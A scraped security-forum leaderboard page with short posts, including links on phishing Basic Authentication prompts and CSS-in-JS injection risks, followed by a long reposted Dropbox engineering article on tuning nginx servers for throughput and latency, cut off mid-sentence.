Leaderboard
Popular Content
Showing content with the highest reputation on 09/06/17 in all areas
-
M-a tot văzut ca bântui pe aici pe forum si na, totuși e prea tare. Cel mai tare cadou de ziua mea https://imgur.com/a/Xv1DU12 points
-
Cand am citit titlul credeam ca vii sa ceri sfaturi de gonoree, sifilis, chlamydia, etc.6 points
-
Title:Phishy Basic Authentication prompts URL: https://securitycafe.ro/2017/09/06/phishy-basic-authentication-prompts/ Author: @TheTime5 points
-
Cateva trucuri interesante pentru CSS Injection. Article: https://reactarmory.com/answers/how-can-i-use-css-in-js-securely Author: James K Nelson Summary: Exploiting CSS-in-JS CSS-in-JS tools are like eval for CSS. They’ll take any input and evaluate it as CSS. The problem is that they’ll literally evaluate any input, even if it is untrusted. And to make matters worse, they encourageuntrusted input, by allowing you to pass in variables via props. If your styled components have props whose value is set by your users, you’ll need to manually sanitize the inputs. Otherwise malicious users will be able to inject arbitrary styles into other user’s pages. But styles are just styles, right? They can’t be that scary…5 points
-
Da chiar, @Nytro, apuca-te si fa si tu tricouri si cani si stickere. Tranteste un shop si cand comanda lumea te duci fuga si printezi. Mai faci un ban pentru site.5 points
-
Optimizing web servers for high throughput and low latency Alexey Ivanov Today 63 210 This is an expanded version of my talk at NginxConf 2017 on September 6, 2017. As an SRE on the Dropbox Traffic Team, I’m responsible for our Edge network: its reliability, performance, and efficiency. The Dropbox edge network is an nginx-based proxy tier designed to handle both latency-sensitive metadata transactions and high-throughput data transfers. In a system that is handling tens of gigabits per second while simultaneously processing tens of thousands latency-sensitive transactions, there are efficiency/performance optimizations throughout the proxy stack, from drivers and interrupts, through TCP/IP and kernel, to library, and application level tunings. Disclaimer In this post we’ll be discussing lots of ways to tune web servers and proxies. Please do not cargo-cult them. For the sake of the scientific method, apply them one-by-one, measure their effect, and decide whether they are indeed useful in your environment. This is not a Linux performance post, even though I will make lots of references to bcc tools, eBPF, and perf, this is by no means the comprehensive guide to using performance profiling tools. If you want to learn more about them you may want to read through Brendan Gregg’s blog. This is not a browser-performance post either. I’ll be touching client-side performance when I cover latency-related optimizations, but only briefly. If you want to know more, you should read High Performance Browser Networking by Ilya Grigorik. And, this is also not the TLS best practices compilation. Though I’ll be mentioning TLS libraries and their settings a bunch of times, you and your security team, should evaluate the performance and security implications of each of them. You can use Qualys SSL Test, to verify your endpoint against the current set of best practices, and if you want to know more about TLS in general, consider subscribing to Feisty Duck Bulletproof TLS Newsletter. Structure of the post We are going to discuss efficiency/performance optimizations of different layers of the system. Starting from the lowest levels like hardware and drivers: these tunings can be applied to pretty much any high-load server. Then we’ll move to linux kernel and its TCP/IP stack: these are the knobs you want to try on any of your TCP-heavy boxes. Finally we’ll discuss library and application-level tunings, which are mostly applicable to web servers in general and nginx specifically. For each potential area of optimization I’ll try to give some background on latency/throughput tradeoffs (if any), monitoring guidelines, and, finally, suggest tunings for different workloads. Hardware CPU For good asymmetric RSA/EC performance you are looking for processors with at least AVX2 (avx2 in /proc/cpuinfo) support and preferably for ones with large integer arithmetic capable hardware (bmi and adx). For the symmetric cases you should look for AES-NI for AES ciphers and AVX512 for ChaCha+Poly. Intel has a performance comparison of different hardware generations with OpenSSL 1.0.2, that illustrates effect of these hardware offloads. Latency sensitive use-cases, like routing, will benefit from fewer NUMA nodes and disabled HT. High-throughput tasks do better with more cores, and will benefit from Hyper-Threading (unless they are cache-bound), and generally won’t care about NUMA too much. Specifically, if you go the Intel path, you are looking for at least Haswell/Broadwell and ideally Skylake CPUs. If you are going with AMD, EPYC has quite impressive performance. NIC Here you are looking for at least 10G, preferably even 25G. If you want to push more than that through a single server over TLS, the tuning described here will not be sufficient, and you may need to push TLS framing down to the kernel level (e.g. FreeBSD, Linux). On the software side, you should look for open source drivers with active mailing lists and user communities. This will be very important if (but most likely, when) you’ll be debugging driver-related problems. Memory The rule of thumb here is that latency-sensitive tasks need faster memory, while throughput-sensitive tasks need more memory. Hard Drive It depends on your buffering/caching requirements, but if you are going to buffer or cache a lot you should go for flash-based storage. Some go as far as using a specialized flash-friendly filesystem (usually log-structured), but they do not always perform better than plain ext4/xfs. Anyway just be careful to not burn through your flash because you forgot to turn enable TRIM, or update the firmware. Operating systems: Low level Firmware You should keep your firmware up-to-date to avoid painful and lengthy troubleshooting sessions. Try to stay recent with CPU Microcode, Motherboard, NICs, and SSDs firmwares. That does not mean you should always run bleeding edge—the rule of thumb here is to run the second to the latest firmware, unless it has critical bugs fixed in the latest version, but not run too far behind. Drivers The update rules here are pretty much the same as for firmware. Try staying close to current. One caveat here is to try to decoupling kernel upgrades from driver updates if possible. For example you can pack your drivers with DKMS, or pre-compile drivers for all the kernel versions you use. That way when you update the kernel and something does not work as expected there is one less thing to troubleshoot. CPU Your best friend here is the kernel repo and tools that come with it. In Ubuntu/Debian you can install the linux-tools package, with handful of utils, but now we only use cpupower, turbostat, and x86_energy_perf_policy. To verify CPU-related optimizations you can stress-test your software with your favorite load-generating tool (for example, Yandex uses Yandex.Tank.) Here is a presentation from the last NginxConf from developers about nginx loadtesting best-practices: “NGINX Performance testing.” cpupower Using this tool is way easier than crawling /proc/. To see info about your processor and its frequency governor you should run: $ cpupower frequency-info ... driver: intel_pstate ... available cpufreq governors: performance powersave ... The governor "performance" may decide which speed to use ... boost state support: Supported: yes Active: yes Check that Turbo Boost is enabled, and for Intel CPUs make sure that you are running with intel_pstate, not the acpi-cpufreq, or even pcc-cpufreq. If you still using acpi-cpufreq, then you should upgrade the kernel, or if that’s not possible, make sure you are using performance governor. When running with intel_pstate, even powersave governor should perform well, but you need to verify it yourself. And speaking about idling, to see what is really happening with your CPU, you can use turbostat to directly look into processor’s MSRs and fetch Power, Frequency, and Idle State information: # turbostat --debug -P ... Avg_MHz Busy% ... CPU%c1 CPU%c3 CPU%c6 ... Pkg%pc2 Pkg%pc3 Pkg%pc6 ... Here you can see the actual CPU frequency (yes, /proc/cpuinfo is lying to you), and core/package idle states. If even with the intel_pstate driver the CPU spends more time in idle than you think it should, you can: Set governor to performance. Set x86_energy_perf_policy to performance. Or, only for very latency critical tasks you can: Use [/dev/cpu_dma_latency](https://access.redhat.com/articles/65410) interface. For UDP traffic, use busy-polling. You can learn more about processor power management in general and P-states specifically in the Intel OpenSource Technology Center presentation “Balancing Power and Performance in the Linux Kernel” from LinuxCon Europe 2015. CPU Affinity You can additionally reduce latency by applying CPU affinity on each thread/process, e.g. nginx has worker_cpu_affinity directive, that can automatically bind each web server process to its own core. This should eliminate CPU migrations, reduce cache misses and pagefaults, and slightly increase instructions per cycle. All of this is verifiable through perf stat. Sadly, enabling affinity can also negatively affect performance by increasing the amount of time a process spends waiting for a free CPU. This can be monitored by running runqlat on one of your nginx worker’s PIDs: usecs : count distribution 0 -> 1 : 819 | | 2 -> 3 : 58888 |****************************** | 4 -> 7 : 77984 |****************************************| 8 -> 15 : 10529 |***** | 16 -> 31 : 4853 |** | ... 4096 -> 8191 : 34 | | 8192 -> 16383 : 39 | | 16384 -> 32767 : 17 | | If you see multi-millisecond tail latencies there, then there is probably too much stuff going on on your servers besides nginx itself, and affinity will increase latency, instead of decreasing it. Memory All mm/ tunings are usually very workflow specific, there are only a handful of things to recommend: Set THP to madvise and enable them only when you are sure they are beneficial, otherwise you may get a order of magnitude slowdown while aiming for 20% latency improvement. Unless you are only utilizing only a single NUMA node you should set vm.zone_reclaim_mode to 0. ## NUMA Modern CPUs are actually multiple separate CPU dies connected by very fast interconnect and sharing various resources, starting from L1 cache on the HT cores, through L3 cache within the package, to Memory and PCIe links within sockets. This is basically what NUMA is: multiple execution and storage units with a fast interconnect. For the comprehensive overview of NUMA and its implications you can consult “NUMA Deep Dive Series” by Frank Denneman. But, long story short, you have a choice of: Ignoring it, by disabling it in BIOS or running your software under numactl --interleave=all, you can get mediocre, but somewhat consistent performance. Denying it, by using single node servers, just like Facebook does with OCP Yosemite platform. Embracing it, by optimizing CPU/memory placing in both user- and kernel-space. Let’s talk about the third option, since there is not much optimization needed for the first two. To utilize NUMA properly you need to treat each numa node as a separate server, for that you should first inspect the topology, which can be done with numactl --hardware: $ numactl --hardware available: 4 nodes (0-3) node 0 cpus: 0 1 2 3 16 17 18 19 node 0 size: 32149 MB node 1 cpus: 4 5 6 7 20 21 22 23 node 1 size: 32213 MB node 2 cpus: 8 9 10 11 24 25 26 27 node 2 size: 0 MB node 3 cpus: 12 13 14 15 28 29 30 31 node 3 size: 0 MB node distances: node 0 1 2 3 0: 10 16 16 16 1: 16 10 16 16 2: 16 16 10 16 3: 16 16 16 10 Things to look after: number of nodes. memory sizes for each node. number of CPUs for each node. distances between nodes. This is a particularly bad example since it has 4 nodes as well as nodes without memory attached. It is impossible to treat each node here as a separate server without sacrificing half of the cores on the system. We can verify that by using numastat: $ numastat -n -c Node 0 Node 1 Node 2 Node 3 Total -------- -------- ------ ------ -------- Numa_Hit 26833500 11885723 0 0 38719223 Numa_Miss 18672 8561876 0 0 8580548 Numa_Foreign 8561876 18672 0 0 8580548 Interleave_Hit 392066 553771 0 0 945836 Local_Node 8222745 11507968 0 0 19730712 Other_Node 18629427 8939632 0 0 27569060 You can also ask numastat to output per-node memory usage statistics in the /proc/meminfo format: $ numastat -m -c Node 0 Node 1 Node 2 Node 3 Total ------ ------ ------ ------ ----- MemTotal 32150 32214 0 0 64363 MemFree 462 5793 0 0 6255 MemUsed 31688 26421 0 0 58109 Active 16021 8588 0 0 24608 Inactive 13436 16121 0 0 29557 Active(anon) 1193 970 0 0 2163 Inactive(anon) 121 108 0 0 229 Active(file) 14828 7618 0 0 22446 Inactive(file) 13315 16013 0 0 29327 ... FilePages 28498 23957 0 0 52454 Mapped 131 130 0 0 261 AnonPages 962 757 0 0 1718 Shmem 355 323 0 0 678 KernelStack 10 5 0 0 16 Now lets look at the example of a simpler topology. $ numactl --hardware available: 2 nodes (0-1) node 0 cpus: 0 1 2 3 4 5 6 7 16 17 18 19 20 21 22 23 node 0 size: 46967 MB node 1 cpus: 8 9 10 11 12 13 14 15 24 25 26 27 28 29 30 31 node 1 size: 48355 MB Since the nodes are mostly symmetrical we can bind an instance of our application to each NUMA node with numactl --cpunodebind=X --membind=X and then expose it on a different port, that way you can get better throughput by utilizing both nodes and better latency by preserving memory locality. You can verify NUMA placement efficiency by latency of your memory operations, e.g. by using bcc’s funclatency to measure latency of the memory-heavy operation, e.g. memmove. On the kernel side, you can observe efficiency by using perf stat and looking for corresponding memory and scheduler events: # perf stat -e sched:sched_stick_numa,sched:sched_move_numa,sched:sched_swap_numa,migrate:mm_migrate_pages,minor-faults -p PID ... 1 sched:sched_stick_numa 3 sched:sched_move_numa 41 sched:sched_swap_numa 5,239 migrate:mm_migrate_pages 50,161 minor-faults The last bit of NUMA-related optimizations for network-heavy workloads comes from the fact that a network card is a PCIe device and each device is bound to its own NUMA-node, therefore some CPUs will have lower latency when talking to the network. We’ll discuss optimizations that can be applied there when we discuss NIC→CPU affinity, but for now lets switch gears to PCI-Express… PCIe Normally you do not need to go too deep into PCIe troubleshooting unless you have some kind of hardware malfunction. Therefore it’s usually worth spending minimal effort there by just creating “link width”, “link speed”, and possibly RxErr/BadTLP alerts for your PCIe devices. This should save you troubleshooting hours because of broken hardware or failed PCIe negotiation. You can use lspci for that: # lspci -s 0a:00.0 -vvv ... LnkCap: Port #0, Speed 8GT/s, Width x8, ASPM L1, Exit Latency L0s <2us, L1 <16us LnkSta: Speed 8GT/s, Width x8, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- ... Capabilities: [100 v2] Advanced Error Reporting UESta: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- ... UEMsk: DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- ... UESvrt: DLP+ SDES+ TLP- FCP+ CmpltTO- CmpltAbrt- ... CESta: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr- CEMsk: RxErr- BadTLP- BadDLLP- Rollover- Timeout- NonFatalErr+ PCIe may become a bottleneck though if you have multiple high-speed devices competing for the bandwidth (e.g. when you combine fast network with fast storage), therefore you may need to physically shard your PCIe devices across CPUs to get maximum throughput. source: https://en.wikipedia.org/wiki/PCI_Express#History_and_revisions Also see the article, “Understanding PCIe Configuration for Maximum Performance,” on the Mellanox website, that goes a bit deeper into PCIe configuration, which may be helpful at higher speeds if you observe packet loss between the card and the OS. Intel suggests that sometimes PCIe power management (ASPM) may lead to higher latencies and therefore higher packet loss. You can disable it by adding pcie_aspm=off to the kernel cmdline. NIC Before we start, it worth mentioning that both Intel and Mellanox have their own performance tuning guides and regardless of the vendor you pick it’s beneficial to read both of them. Also drivers usually come with a README on their own and a set of useful utilities. Next place to check for the guidelines is your operating system’s manuals, e.g. Red Hat Enterprise Linux Network Performance Tuning Guide, which explains most of the optimizations mentioned below and even more. Cloudflare also has a good article about tuning that part of the network stack on their blog, though it is mostly aimed at low latency use-cases. When optimizing NICs ethtool will be your best friend. A small note here: if you are using a newer kernel (and you really should!) you should also bump some parts of your userland, e.g. for network operations you probably want newer versions of: ethtool, iproute2, and maybe iptables/nftables packages. Valuable insight into what is happening with you network card can be obtained via ethtool -S: $ ethtool -S eth0 | egrep 'miss|over|drop|lost|fifo' rx_dropped: 0 tx_dropped: 0 port.rx_dropped: 0 port.tx_dropped_link_down: 0 port.rx_oversize: 0 port.arq_overflows: 0 Consult with your NIC manufacturer for detailed stats description, e.g. Mellanox have a dedicated wiki page for them. From the kernel side of things you’ll be looking at /proc/interrupts, /proc/softirqs, and /proc/net/softnet_stat. There are two useful bcc tools here: hardirqs and softirqs. Your goal in optimizing the network is to tune the system until you have minimal CPU usage while having no packet loss. Interrupt Affinity Tunings here usually start with spreading interrupts across the processors. How specifically you should do that depends on your workload: For maximum throughput you can distribute interrupts across all NUMA-nodes in the system. To minimize latency you can limit interrupts to a single NUMA-node. To do that you may need to reduce the number of queues to fit into a single node (this usually implies cutting their number in half with ethtool -L). Vendors usually provide scripts to do that, e.g. Intel has set_irq_affinity. Ring buffer sizes Network cards need to exchange information with the kernel. This is usually done through a data structure called a “ring”, current/maximum size of that ring viewed via ethtool -g: $ ethtool -g eth0 Ring parameters for eth0: Pre-set maximums: RX: 4096 TX: 4096 Current hardware settings: RX: 4096 TX: 4096 You can adjust these values within pre-set maximums with -G. Generally bigger is better here (esp. if you are using interrupt coalescing), since it will give you more protection against bursts and in-kernel hiccups, therefore reducing amount of dropped packets due to no buffer space/missed interrupt. But there are couple of caveats: On older kernels, or drivers without BQL support, high values may attribute to a higher bufferbloat on the tx-side. Bigger buffers will also increase cache pressure, so if you are experiencing one, try lowing them. Coalescing Interrupt coalescing allows you to delay notifying the kernel about new events by aggregating multiple events in a single interrupt. Current setting can be viewed via ethtool -c: $ ethtool -c eth0 Coalesce parameters for eth0: ... rx-usecs: 50 tx-usecs: 50 You can either go with static limits, hard-limiting maximum number of interrupts per second per core, or depend on the hardware to automatically adjust the interrupt rate based on the throughput. Enabling coalescing (with -C) will increase latency and possibly introduce packet loss, so you may want to avoid it for latency sensitive. On the other hand, disabling it completely may lead to interrupt throttling and therefore limit your performance. Offloads Modern network cards are relatively smart and can offload a great deal of work to either hardware or emulate that offload in drivers themselves. All possible offloads can be obtained with ethtool -k: $ ethtool -k eth0 Features for eth0: ... tcp-segmentation-offload: on generic-segmentation-offload: on generic-receive-offload: on large-receive-offload: off [fixed] In the output all non-tunable offloads are marked with [fixed] suffix. There is a lot to say about all of them, but here are some rules of thumb: do not enable LRO, use GRO instead. be cautious about TSO, since it highly depends on the quality of your drivers/firmware. do not enable TSO/GSO on old kernels, since it may lead to excessive bufferbloat. **** Packet Steering All modern NICs are optimized for multi-core hardware, therefore they internally split packets into virtual queues, usually one-per CPU. When it is done in hardware it is called RSS, when the OS is responsible for loadbalancing packets across CPUs it is called RPS (with its TX-counterpart called XPS). When the OS also tries to be smart and route flows to the CPUs that are currently handling that socket, it is called RFS. When hardware does that it is called “Accelerated RFS” or aRFS for short. Here are couple of best practices from our production: If you are using newer 25G+ hardware it probably has enough queues and a huge indirection table to be able to just RSS across all your cores. Some older NICs have limitations of only utilizing the first 16 CPUs. You can try enabling RPS if: you have more CPUs than hardware queues and you want to sacrifice latency for throughput. you are using internal tunneling (e.g. GRE/IPinIP) that NIC can’t RSS; Do not enable RPS if your CPU is quite old and does not have x2APIC. Binding each CPU to its own TX queue through XPS is generally a good idea. Effectiveness of RFS is highly depended on your workload and whether you apply CPU affinity to it. **** Flow Director and ATR Enabled flow director (or fdir in Intel terminology) operates by default in an Application Targeting Routing mode which implements aRFS by sampling packets and steering flows to the core where they presumably are being handled. Its stats are also accessible through ethtool -S:$ ethtool -S eth0 | egrep ‘fdir’ port.fdir_flush_cnt: 0 … Though Intel claims that fdir increases performance in some cases, external research suggests that it can also introduce up to 1% of packet reordering, which can be quite damaging for TCP performance. Therefore try testing it for yourself and see if FD is useful for your workload, while keeping an eye for the TCPOFOQueue counter. Operating systems: Networking stack There are countless books, videos, and tutorials for the tuning the Linux networking stack. And sadly tons of “sysctl.conf cargo-culting” that comes with them. Even though recent kernel versions do not require as much tuning as they used to 10 years ago and most of the new TCP/IP features are enabled and well-tuned by default, people are still copy-pasting their old sysctls.conf that they’ve used to tune 2.6.18/2.6.32 kernels. To verify effectiveness of network-related optimizations you should: Collect system-wide TCP metrics via /proc/net/snmp and /proc/net/netstat. Aggregate per-connection metrics obtained either from ss -n --extended --info, or from calling getsockopt(``[TCP_INFO](http://linuxgazette.net/136/pfeiffer.html)``)/getsockopt(``[TCP_CC_INFO](https://patchwork.ozlabs.org/patch/465806/)``) inside your werbserver. tcptrace(1)’es of sampled TCP flows. Analyze RUM metrics from the app/browser. For sources of information about network optimizations, I usually enjoy conference talks by CDN-folks since they generally know what they are doing, e.g. Fastly on LinuxCon Australia. Listening what Linux kernel devs say about networking is quite enlightening too, for example netdevconf talks and NETCONF transcripts. It worth highlighting good deep-dives into Linux networking stack by PackageCloud, especially since they put an accent on monitoring instead of blindly tuning things: Monitoring and Tuning the Linux Networking Stack: Receiving Data Monitoring and Tuning the Linux Networking Stack: Sending Data Before we start, let me state it one more time: upgrade your kernel! There are tons of new network stack improvements, and I’m not even talking about IW10 (which is so 2010). I am talking about new hotness like: TSO autosizing, FQ, pacing, TLP, and RACK, but more on that later. As a bonus by upgrading to a new kernel you’ll get a bunch of scalability improvements, e.g.: removed routing cache, lockless listen sockets, SO_REUSEPORT, and many more. Overview From the recent Linux networking papers the one that stands out is “Making Linux TCP Fast.” It manages to consolidate multiple years of Linux kernel improvements on 4 pages by breaking down Linux sender-side TCP stack into functional pieces: Fair Queueing and Pacing Fair Queueing is responsible for improving fairness and reducing head of line blocking between TCP flows, which positively affects packet drop rates. Pacing schedules packets at rate set by congestion control equally spaced over time, which reduces packet loss even further, therefore increasing throughput. As a side note: Fair Queueing and Pacing are available in linux via fq qdisc. Some of you may know that these are a requirement for BBR (not anymore though), but both of them can be used with CUBIC, yielding up to 15-20% reduction in packet loss and therefore better throughput on loss-based CCs. Just don’t use it in older kernels (< 3.19), since you will end up pacing pure ACKs and cripple your uploads/RPCs. TSO autosizing and TSQ Both of these are responsible for limiting buffering inside the TCP stack and hence reducing latency, without sacrificing throughput. Congestion Control CC algorithms are a huge subject by itself, and there was a lot of activity around them in recent years. Some of that activity was codified as: tcp_cdg (CAIA), tcp_nv (Facebook), and tcp_bbr (Google). We won’t go too deep into discussing their inner-workings, let’s just say that all of them rely more on delay increases than packet drops for a congestion indication. BBR is arguably the most well-documented, tested, and practical out of all new congestion controls. The basic idea is to create a model of the network path based on packet delivery rate and then execute control loops to maximize bandwidth while minimizing rtt. This is exactly what we are looking for in our proxy stack. Preliminary data from BBR experiments on our Edge PoPs shows an increase of file download speeds: 6 hour TCP BBR experiment in Tokyo PoP: x-axis — time, y-axis — client download speed Here I want to stress out that we observe speed increase across all percentiles. That is not the case for backend changes. These usually only benefit p90+ users (the ones with the fastest internet connectivity), since we consider everyone else being bandwidth-limited already. Network-level tunings like changing congestion control or enabling FQ/pacing show that users are not being bandwidth-limited but, if I can say this, they are “TCP-limited.” If you want to know more about BBR, APNIC has a good entry-level overview of BBR (and its comparison to loss-based congestions controls). For more in-depth information on BBR you probably want to read through bbr-dev mailing list archives (it has a ton of useful links pinned at the top). For people interested in congestion control in general it may be fun to follow Internet Congestion Control Research Group activity. ACK Processing and Loss Detection But enough about congestion control, let’s talk about let’s talk about loss detection, here once again running the latest kernel will help quite a bit. New heuristics like TLP and RACK are constantly being added to TCP, while the old stuff like FACK and ER is being retired. Once added, they are enabled by default so you do not need to tune any system settings after the upgrade. Userspace prioritization and HOL Userspace socket APIs provide implicit buffering and no way to re-order chunks once they are sent, therefore in multiplexed scenarios (e.g. HTTP/2) this may result in a HOL blocking, and inversion of h2 priorities. [TCP_NOTSENT_LOWAT](https://lwn.net/Articles/560082/) socket option (and corresponding net.ipv4.tcp_notsent_lowat sysctl) were designed to solve this problem by setting a threshold at which the socket considers itself writable (i.e. epoll will lie to your app). This can solve problems with HTTP/2 prioritization, but it can also potentially negatively affect throughput, so you know the drill—test it yourself. Sysctls One does not simply give a networking optimization talk without mentioning sysctls that need to be tuned. But let me first start with the stuff you don’t want to touch: net.ipv4.tcp_tw_recycle=1—don’t use it—it was already broken for users behind NAT, but if you upgrade your kernel, it will be broken for everyone. net.ipv4.tcp_timestamps=0—don’t disable them unless you know all side-effects and you are OK with them. For example, one of non-obvious side effects is that you will loose window scaling and SACK options on syncookies. As for sysctls that you should be using: net.ipv4.tcp_slow_start_after_idle=0—the main problem with slowstart after idle is that “idle” is defined as one RTO, which is too small. net.ipv4.tcp_mtu_probing=1—useful if there are ICMP blackholes between you and your clients (most likely there are). net.ipv4.tcp_rmem, net.ipv4.tcp_wmem—should be tuned to fit BDP, just don’t forget that bigger isn’t always better. echo 2 > /sys/module/tcp_cubic/parameters/hystart_detect—if you are using fq+cubic, this might help with tcp_cubic exiting the slow-start too early. It also worth noting that there is an RFC draft (though a bit inactive) from the author of curl, Daniel Stenberg, named TCP Tuning for HTTP, that tries to aggregate all system tunings that may be beneficial to HTTP in a single place. Application level: Midlevel Tooling Just like with the kernel, having up-to-date userspace is very important. You should start with upgrading your tools, for example you can package newer versions of perf, bcc, etc. Once you have new tooling you are ready to properly tune and observe the behavior of a system. Through out this part of the post we’ll be mostly relying on on-cpu profiling with perf top, on-CPU flamegraphs, and adhoc histograms from bcc’s funclatency. Compiler Toolchain Having a modern compiler toolchain is essential if you want to compile hardware-optimized assembly, which is present in many libraries commonly used by web servers. Aside from the performance, newer compilers have new security features (e.g. [-fstack-protector-strong](https://docs.google.com/document/d/1xXBH6rRZue4f296vGt9YQcuLVQHeE516stHwt8M9xyU/edit) or [SafeStack](https://clang.llvm.org/docs/SafeStack.html)) that you want to be applied on the edge. The other use case for modern toolchains is when you want to run your test harnesses against binaries compiled with sanitizers (e.g. AddressSanitizer, and friends). System libraries It’s also worth upgrading system libraries, like glibc, since otherwise you may be missing out on recent optimizations in low-level functions from -lc, -lm, -lrt, etc. Test-it-yourself warning also applies here, since occasional regressions creep in. Zlib Normally web server would be responsible for compression. Depending on how much data is going though that proxy, you may occasionally see zlib’s symbols in perf top, e.g.: # perf top ... 8.88% nginx [.] longest_match 8.29% nginx [.] deflate_slow 1.90% nginx [.] compress_block There are ways of optimizing that on the lowest levels: both Intel and Cloudflare, as well as a standalone zlib-ng project, have their zlib forks which provide better performance by utilizing new instructions sets. Malloc We’ve been mostly CPU-oriented when discussing optimizations up until now, but let’s switch gears and discuss memory-related optimizations. If you use lots of Lua with FFI or heavy third party modules that do their own memory management, you may observe increased memory usage due to fragmentation. You can try solving that problem by switching to either jemalloc or tcmalloc. Using custom malloc also has the following benefits: Separating your nginx binary from the environment, so that glibc version upgrades and OS migration will affect it less. Better introspection, profiling and stats. ## PCRE If you use many complex regular expressions in your nginx configs or heavily rely on Lua, you may see pcre-related symbols in perf top. You can optimize that by compiling PCRE with JIT, and also enabling it in nginx via pcre_jit on;. You can check the result of optimization by either looking at flame graphs, or using funclatency: # funclatency /srv/nginx-bazel/sbin/nginx:ngx_http_regex_exec -u ... usecs : count distribution 0 -> 1 : 1159 |********** | 2 -> 3 : 4468 |****************************************| 4 -> 7 : 622 |***** | 8 -> 15 : 610 |***** | 16 -> 31 : 209 |* | 32 -> 63 : 91 | | TLS If you are terminating TLS on the edge w/o being fronted by a CDN, then TLS performance optimizations may be highly valuable. When discussing tunings we’ll be mostly focusing server-side efficiency. So, nowadays first thing you need to decide is which TLS library to use: Vanilla OpenSSL, OpenBSD’s LibreSSL, or Google’s BoringSSL. After picking the TLS library flavor, you need to properly build it: OpenSSL for example has a bunch of built-time heuristics that enable optimizations based on build environment; BoringSSL has deterministic builds, but sadly is way more conservative and just disables some optimizations by default. Anyway, here is where choosing a modern CPU should finally pay off: most TLS libraries can utilize everything from AES-NI and SSE to ADX and AVX512. You can use built-in performance tests that come with your TLS library, e.g. in BoringSSL case it’s the bssl speed. Most of performance comes not from the hardware you have, but from cipher-suites you are going to use, so you have to optimize them carefully. Also know that changes here can (and will!) affect security of your web server—the fastest ciphersuites are not necessarily the best. If unsure what encryption settings to use, Mozilla SSL Configuration Generator is a good place to start. Asymmetric Encryption If your service is on the edge, then you may observe a considerable amount of TLS handshakes and therefore have a good chunk of your CPU consumed by the asymmetric crypto, making it an obvious target for optimizations. To optimize server-side CPU usage you can switch to ECDSA certs, which are generally 10x faster than RSA. Also they are considerably smaller, so it may speedup handshake in presence of packet-loss. But ECDSA is also heavily dependent on the quality of your system’s random number generator, so if you are using OpenSSL, be sure to have enough entropy (with BoringSSL you do not need to worry about that). As a side note, it worth mentioning that bigger is not always better, e.g. using 4096 RSA certs will degrade your performance by 10x: $ bssl speed Did 1517 RSA 2048 signing ... (1507.3 ops/sec) Did 160 RSA 4096 signing ... (153.4 ops/sec) To make it worse, smaller isn’t necessarily the best choice either: by using non-common p-224 field for ECDSA you’ll get 60% worse performance compared to a more common p-256: $ bssl speed Did 7056 ECDSA P-224 signing ... (6831.1 ops/sec) Did 17000 ECDSA P-256 signing ... (16885.3 ops/sec) The rule of thumb here is that the most commonly used encryption is generally the most optimized one. When running properly optimized OpenTLS-based library using RSA certs, you should see the following traces in your perf top: AVX2-capable, but not ADX-capable boxes (e.g. Haswell) should use AVX2 codepath: 6.42% nginx [.] rsaz_1024_sqr_avx2 1.61% nginx [.] rsaz_1024_mul_avx2 While newer hardware should use a generic montgomery multiplication with ADX codepath: 7.08% nginx [.] sqrx8x_internal 2.30% nginx [.] mulx4x_internal Symmetric Encryption If you have lot’s of bulk transfers like videos, photos, or more generically files, then you may start observing symmetric encryption symbols in profiler’s output. Here you just need to make sure that your CPU has AES-NI support and you set your server-side preferences for AES-GCM ciphers. Properly tuned hardware should have following in perf top: 8.47% nginx [.] aesni_ctr32_ghash_6x But it’s not only your servers that will need to deal with encryption/decryption—your clients will share the same burden on a way less capable CPU. Without hardware acceleration this may be quite challenging, therefore you may consider using an algorithm that was designed to be fast without hardware acceleration, e.g. ChaCha20-Poly1305. This will reduce TTLB for some of your mobile clients. ChaCha20-Poly1305 is supported in BoringSSL out of the box, for OpenSSL 1.0.2 you may consider using Cloudflare patches. BoringSSL also supports “equal preference cipher groups,” so you may use the following config to let clients decide what ciphers to use based on their hardware capabilities (shamelessly stolen from cloudflare/sslconfig): ssl_ciphers '[ECDHE-ECDSA-AES128-GCM-SHA256|ECDHE-ECDSA-CHACHA20-POLY1305|ECDHE-RSA-AES128-GCM-SHA256|ECDHE-RSA-CHACHA20-POLY1305]:ECDHE+AES128:RSA+AES128:ECDHE+AES256:RSA+AES256:ECDHE+3DES:RSA+3DES'; ssl_prefer_server_ciphers on; Application level: Highlevel To analyze effectiveness of your optimizations on that level you will need to collect RUM data. In browsers you can use Navigation Timing APIs and Resource Timing APIs. Your main metrics are TTFB and TTV/TTI. Having that data in an easily queriable and graphable formats will greatly simplify iteration. Compression Compression in nginx starts with mime.types file, which defines default correspondence between file extension and response MIME type. Then you need to define what types you want to pass to your compressor with e.g. [gzip_types](http://nginx.org/en/docs/http/ngx_http_gzip_module.html#gzip_types). If you want the complete list you can use mime-db to autogenerate your mime.types and to add those with .compressible == true to gzip_types. When enabling gzip, be careful about two aspects of it: Increased memory usage. This can be solved by limiting gzip_buffers. Increased TTFB due to the buffering. This can be solved by using [gzip_no_buffer](http://hg.nginx.org/nginx/file/c7d4017c8876/src/http/modules/ngx_http_gzip_filter_module.c#l182). As a side note, http compression is not limited to gzip exclusively: nginx has a third party [ngx_brotli](https://github.com/google/ngx_brotli) module that can improve compression ratio by up to 30% compared to gzip. As for compression settings themselves, let’s discuss two separate use-cases: static and dynamic data. For static data you can archive maximum compression ratios by pre-compressing your static assets as a part of the build process. We discussed that in quite a detail in the Deploying Brotli for static content post for both gzip and brotli. For dynamic data you need to carefully balance a full roundtrip: time to compress the data + time to transfer it + time to decompress on the client. Therefore setting the highest possible compression level may be unwise, not only from CPU usage perspective, but also from TTFB. ## Buffering Buffering inside the proxy can greatly affect web server performance, especially with respect to latency. The nginx proxy module has various buffering knobs that are togglable on a per-location basis, each of them is useful for its own purpose. You can separately control buffering in both directions via proxy_request_buffering and proxy_buffering. If buffering is enabled the upper limit on memory consumption is set by client_body_buffer_size and proxy_buffers, after hitting these thresholds request/response is buffered to disk. For responses this can be disabled by setting proxy_max_temp_file_size to 0. Most common approaches to buffering are: Buffer request/response up to some threshold in memory and then overflow to disk. If request buffering is enabled, you only send a request to the backend once it is fully received, and with response buffering, you can instantaneously free a backend thread once it is ready with the response. This approach has the benefits of improved throughput and backend protection at the cost of increased latency and memory/io usage (though if you use SSDs that may not be much of a problem). No buffering. Buffering may not be a good choice for latency sensitive routes, especially ones that use streaming. For them you may want to disable it, but now your backend needs to 